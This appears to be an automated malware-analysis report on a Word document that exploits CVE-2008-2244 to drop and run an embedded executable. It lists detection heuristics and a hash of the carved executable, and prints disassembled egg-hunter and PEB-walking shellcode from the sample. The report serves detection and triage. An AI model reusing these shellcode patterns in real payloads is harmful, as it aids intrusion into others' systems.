Verdict: MALICIOUS
Risk Score: 600
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The file is a malicious Microsoft Word document that exploits CVE-2008-2244 to drop and execute an embedded PE executable. The presence of shellcode indicators such as an egg-hunter, PEB access, and references to the WinExec, CreateProcess, WriteProcessMemory, and CreateRemoteThread APIs strongly suggests the execution of a secondary payload. The embedded executable is the primary IOC.
Heuristics (14)

- CVE-2008-2244 — Microsoft Word record-parsing payload (critical, CVE likely, CVE_2008_2244): Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
- Reference to WriteProcessMemory API (critical, SC_STR_WRITEPROCESSMEMORY)
- Reference to CreateRemoteThread API (critical, SC_STR_CREATEREMOTETHREAD)
- Embedded PE executable (critical, OLE_EMBEDDED_EXE): MZ/PE header found inside document — possible embedded executable
- Egg-hunter shellcode pattern (high, SC_EGG_HUNTER)
Disassembly (attempted x86 opcode disassembly):

```asm
00001580 6681caff0f      or dx, 0xfff
00001585 42              inc edx
00001586 66f7c2ff0f      test dx, 0xfff
0000158B 7510            jne 0x159d
0000158D 52              push edx
0000158E 6a02            push 2
00001590 58              pop eax
00001591 cd2e            int 0x2e
00001593 3c05            cmp al, 5
00001595 5a              pop edx
00001596 74e8            je 0x1580
00001598 b841424142      mov eax, 0x42414241
0000159D 8bfa            mov edi, edx
0000159F 8bda            mov ebx, edx
000015A1 6681e3ff0f      and bx, 0xfff
000015A6 6681fbfd0f      cmp bx, 0xffd
000015AB 74d3            je 0x1580
000015AD af              scasd eax, dword ptr es:[edi]
000015AE 75d5            jne 0x1585
000015B0 af              scasd eax, dword ptr es:[edi]
000015B1 75d2            jne 0x1585
000015B3 ffe7            jmp edi
000015B5 cc              int3
000015B6 cc              int3
000015B7 cc              int3
000015B8 cc              int3
000015B9 cc              int3
000015BA cc              int3
000015BB cc              int3
000015BC cc              int3
000015BD cc              int3
000015BE cc              int3
000015BF cc              int3
000015C0 cc              int3
000015C1 3535353535      xor eax, 0x35353535
000015C6 3535353535      xor eax, 0x35353535
000015CB 3535353535      xor eax, 0x35353535
000015D0 3535357862      xor eax, 0x62783535
000015D5 1200            adc al, byte ptr [eax]
000015D7 23242526272829  and esp, dword ptr [0x29282726]
000015DE 3132            xor dword ptr [edx], esi
```
- PEB access via FS segment (x86) (high, SC_PEB_ACCESS)
Disassembly (attempted x86 opcode disassembly):

```asm
00004C3E 64a130000000    mov eax, dword ptr fs:[0x30]
00004C44 8b400c          mov eax, dword ptr [eax + 0xc]
00004C47 8b701c          mov esi, dword ptr [eax + 0x1c]
00004C4A ad              lodsd eax, dword ptr [esi]
00004C4B 8b4008          mov eax, dword ptr [eax + 8]
00004C4E 8985d8feffff    mov dword ptr [ebp - 0x128], eax
00004C54 8985d4feffff    mov dword ptr [ebp - 0x12c], eax
00004C5A 5e              pop esi
00004C5B e80f000000      call 0x4c6f
00004C60 47              inc edi
00004C61 657450          je 0x4cb4
00004C64 726f            jb 0x4cd5
00004C66 634164          arpl word ptr [ecx + 0x64], ax
00004C69 647265          jb 0x4cd1
00004C6C 7373            jae 0x4ce1
00004C6E 005889          add byte ptr [eax - 0x77], bl
00004C71 8518            test dword ptr [eax], ebx
00004C73 fe              .byte 0xfe
00004C74 ff              .byte 0xff
00004C75 ff8985d0feff    dec dword ptr [ecx - 0x12f7b]
00004C7B ffc7            inc edi
00004C7D 85cc            test esp, ecx
00004C7F fe              .byte 0xfe
00004C80 ff              .byte 0xff
00004C81 ff0d000000c7    dec dword ptr [0xc7000000]
00004C87 85e0            test eax, esp
00004C89 fe              .byte 0xfe
00004C8A ff              .byte 0xff
00004C8B ff00            inc dword ptr [eax]
00004C8D 0000            add byte ptr [eax], al
00004C8F 00e8            add al, ch
00004C91 7a02            jp 0x4c95
00004C93 0000            add byte ptr [eax], al
00004C95 89858cfeffff    mov dword ptr [ebp - 0x174], eax
00004C9B e8              .byte 0xe8
00004C9C 0d              .byte 0x0d
00004C9D 00              .byte 0x00
```
- Reference to WinExec API (high, SC_STR_WINEXEC)
- Reference to CreateProcess API (high, SC_STR_CREATEPROCESS)
- Reference to LoadLibrary API (high, SC_STR_LOADLIBRARY)
- Reference to GetProcAddress API (high, SC_STR_GETPROCADDRESS)
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 75,059 bytes but its declared streams total only 16,486 bytes — 58,573 bytes (78%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- OLE file contains raw shellcode-like resolver payload (high, OLE_RAW_SHELLCODE_PAYLOAD): Malformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.
- Reference to VirtualAlloc API (medium, SC_STR_VIRTUALALLOC)
- Reference to VirtualProtect API (medium, SC_STR_VIRTUALPROTECT)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| embedded_office_00005500.exe | embedded-pe | Office MZ+PE at offset 0x5500 | 53299 bytes | 8660bad9b4369e283e88ca7534c6badf27f403de96f6967f45f8bb44e8308d77 |